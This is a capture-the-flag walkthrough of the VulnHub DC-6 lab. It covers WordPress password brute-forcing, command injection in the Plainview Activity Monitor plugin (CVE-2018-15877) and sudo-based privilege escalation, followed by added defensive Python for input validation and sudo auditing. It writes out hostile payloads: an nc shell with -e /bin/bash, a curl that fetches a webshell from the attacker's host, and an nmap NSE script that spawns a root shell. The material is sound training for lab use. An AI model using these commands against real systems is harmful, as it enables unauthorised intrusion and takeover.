vulnhub-dc6-DC6

Target description

Blog http://blog.yutian233.xyz/

DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.

This is VERY important.

And yes, it's another WordPress based VM (although only my second one).

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

CLUE
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. ;-)

Download: https://www.vulnhub.com/entry/dc-6,315/

Outline

  • Information gathering

    • netdiscover
    • nmap
  • Exploitation

    • WordPress plugin Plainview Activity Monitor (CVE-2018-15877)
  • Privilege escalation

    • sudo -l

Information gathering

Target IP

Port scan

nmap 192.168.34.155

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Next, add the hosts entry as the target description says

Build the wordlist

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan

Brute-force the passwords

wpscan --url http://wordy/ -e u --passwords passwords.txt

Result

mark / helpdesk01

Log in to the WordPress admin backend with the brute-forced password

https://www.exploit-db.com/exploits/45274

The installed plugin has a command injection vulnerability

Vulnerable location: http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

Example payload (from the exploit-db entry)
"google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash"

Kali

Edit the webshell file

Start the listener

Web page

The input box has a maximum length; raise that number in the page source so the whole payload fits

Enter the payload

google.fr| curl http://192.168.34.158/shell.php -o sh.php

http://wordy/wp-admin/sh.php

Visit sh.php to get a shell
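The bug class behind CVE-2018-15877 is a host/IP field that is concatenated into a shell command, so a `|` in the field becomes a second command. As an added example (not code from the plugin, the exploit-db entry or this walkthrough), the Python below contrasts the concatenated form with a validated argv form, and adds a check that flags requests whose `ip` field would not validate. The request dict layout, the `dig` lookup and the sample requests are assumptions; the payload string is the one quoted on the exploit-db page.

```python
"""Validate the host parameter before it reaches a shell, and flag requests
carrying shell metacharacters.  Added example; not plugin or walkthrough code."""
import ipaddress
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def validate_target(value: str) -> str:
    """Return value if it is an IP address or hostname, else raise ValueError.
    Spaces, '|', ';', quotes and similar never get past this point."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(value):
        return value
    raise ValueError(f"not a host or IP address: {value!r}")


def unsafe_shell_command(value: str) -> str:
    """The exploitable pattern: user input glued into a string that a shell
    will parse.  Returned, not executed; shown only for contrast."""
    return "dig +short " + value


def lookup_argv(value: str) -> list:
    """Hardened form: the validated value is one argv element, so shell
    operators inside it have no meaning (run with subprocess.run(argv))."""
    return ["dig", "+short", validate_target(value)]


def find_injection_attempts(requests: list) -> list:
    """Flag activity-monitor requests whose 'ip' field does not validate.
    Each request is a dict {path, query, form}, the shape a request-logging
    middleware or WAF might hand over (assumed layout)."""
    hits = []
    for i, req in enumerate(requests):
        if req.get("query", {}).get("page") != "plainview_activity_monitor":
            continue
        ip = req.get("form", {}).get("ip", "")
        try:
            validate_target(ip)
        except ValueError:
            hits.append((i, ip))
    return hits


# Constructed sample requests (not captured traffic).
_Q = {"page": "plainview_activity_monitor", "tab": "activity_tools"}
SAMPLE_REQUESTS = [
    {"path": "/wp-admin/admin.php", "query": _Q, "form": {"ip": "google.fr"}},
    {"path": "/wp-admin/admin.php", "query": _Q,
     "form": {"ip": "google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash"}},
    {"path": "/wp-admin/admin.php", "query": _Q, "form": {"ip": "192.168.34.158"}},
]

if __name__ == "__main__":
    for idx, bad in find_injection_attempts(SAMPLE_REQUESTS):
        print(f"request {idx}: rejected ip={bad!r}")
    print(lookup_argv("google.fr"))
```

The same validator works as a pre-filter in front of any feature that passes a host to `dig`, `ping` or `nmap`; the important part is that the value is passed as its own argv element rather than interpolated into a shell string.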

Move to user graham

The password of user graham is found in the /home/mark/stuff directory

Move to user jens

Redirect /bin/bash into /home/jens/backups.sh (the script is writable, so it is overwritten)

Run sudo -u jens /home/jens/backups.sh to get a session as jens

Get root

echo "os.execute('/bin/sh')">/tmp/shell.nse

sudo -u root /usr/bin/nmap --script=/tmp/shell.nse
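Both escalation steps come from sudo rules: one points at a script the invoking user can rewrite, the other at a binary (nmap with --script) that executes caller-supplied code. As an added example that is not part of the original post, the Python below audits a list of rules for both conditions. It recreates the DC-6 layout with constructed files in a temporary directory; the SCRIPT_RUNNERS table, the script contents and the rule list are constructed, and the writability check reads mode bits only (root is not considered).

```python
"""Audit sudo rules for a target script the invoking user can modify and for
binaries that load user-supplied scripts.  Added example, not walkthrough code."""
import os
import stat
import tempfile

# Binaries that execute code from a path given on the command line.
# Constructed short list; extend it from your own inventory.
SCRIPT_RUNNERS = {"nmap": "--script loads arbitrary Lua (NSE) files"}


def writable_by(path: str, uid: int, gids: set) -> bool:
    """True if uid (member of gids) can write path, judged from mode bits only."""
    st = os.stat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_rule(user: str, uid: int, gids: set, runas: str, command: str) -> list:
    """Findings for one 'user may run command as runas' rule."""
    findings = []
    name = os.path.basename(command)
    if name in SCRIPT_RUNNERS:
        findings.append(f"{user} -> {runas}: {command} {SCRIPT_RUNNERS[name]}")
    if os.path.exists(command) and writable_by(command, uid, gids):
        findings.append(f"{user} -> {runas}: {command} is writable by {user}")
    return findings


def demo() -> list:
    """Constructed layout mirroring the box: a backups.sh the invoking user can
    rewrite, a hardened copy, and an nmap rule.  Returns all findings."""
    uid, gids = os.getuid(), set(os.getgroups())
    with tempfile.TemporaryDirectory() as d:
        weak = os.path.join(d, "backups.sh")
        safe = os.path.join(d, "backups_fixed.sh")
        for p in (weak, safe):
            with open(p, "w") as f:
                f.write("#!/bin/bash\necho backup\n")   # constructed content
        os.chmod(weak, 0o777)   # anyone can replace the script, as on the box
        os.chmod(safe, 0o555)   # fix: no write bit for the invoking user
        rules = [                # constructed; mirrors the sudo -l output
            ("graham", "jens", weak),
            ("graham", "jens", safe),
            ("jens", "root", "/usr/bin/nmap"),
        ]
        out = []
        for user, runas, cmd in rules:
            out += audit_rule(user, uid, gids, runas, cmd)
        return out


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On a real host, feed `audit_rule` with the uid and groups of each user named in the sudoers rules rather than the current process, and keep the SCRIPT_RUNNERS table in sync with the binaries you actually allow under sudo; the fix for the first finding is to make the script root-owned and non-writable, and for the second to avoid granting nmap (or any script-loading tool) as root at all.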
